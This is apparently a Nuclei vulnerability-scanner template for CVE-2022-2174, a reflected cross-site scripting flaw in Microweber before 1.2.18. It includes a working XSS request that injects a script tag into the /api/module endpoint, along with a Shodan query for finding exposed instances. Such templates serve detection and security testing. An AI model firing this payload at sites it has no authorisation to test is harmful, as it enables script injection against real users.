43 lines
1.6 KiB
YAML
43 lines
1.6 KiB
YAML
id: CVE-2022-2174
|
|
|
|
info:
|
|
name: microweber 1.2.18 - Cross-site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.18.
|
|
reference:
|
|
- https://huntr.dev/bounties/ac68e3fc-8cf1-4a62-90ee-95c4b2bad607/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-2174
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-2174
|
|
- https://www.tenable.com/cve/CVE-2022-2174
|
|
- https://github.com/microweber/microweber/commit/c51285f791e48e536111cd57a9544ccbf7f33961
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-2174
|
|
cwe-id: CWE-79
|
|
epss-score: 0.001
|
|
epss-percentile: 0.40832
|
|
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: microweber
|
|
product: microweber
|
|
shodan-query: http.favicon.hash:780351152
|
|
tags: cve,cve2022,huntr,microweber,xss,unauth
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 500'
|
|
- 'contains(body, "<script>alert(document.domain)</script>") && contains(body, "microweber")'
|
|
- 'contains(content_type, "text/html")'
|
|
condition: and
|
|
# digest: 490a0046304402207b0db83c22e130322437f1502e113df36df14a74f5080f56e6281a41e9c5ea0c0220391b8aae54c023d95b44dc3d6d6e938160b8236a2e5b130fc7a3441f22d711a9:922c64590222798bb761d5b6d8e72950 |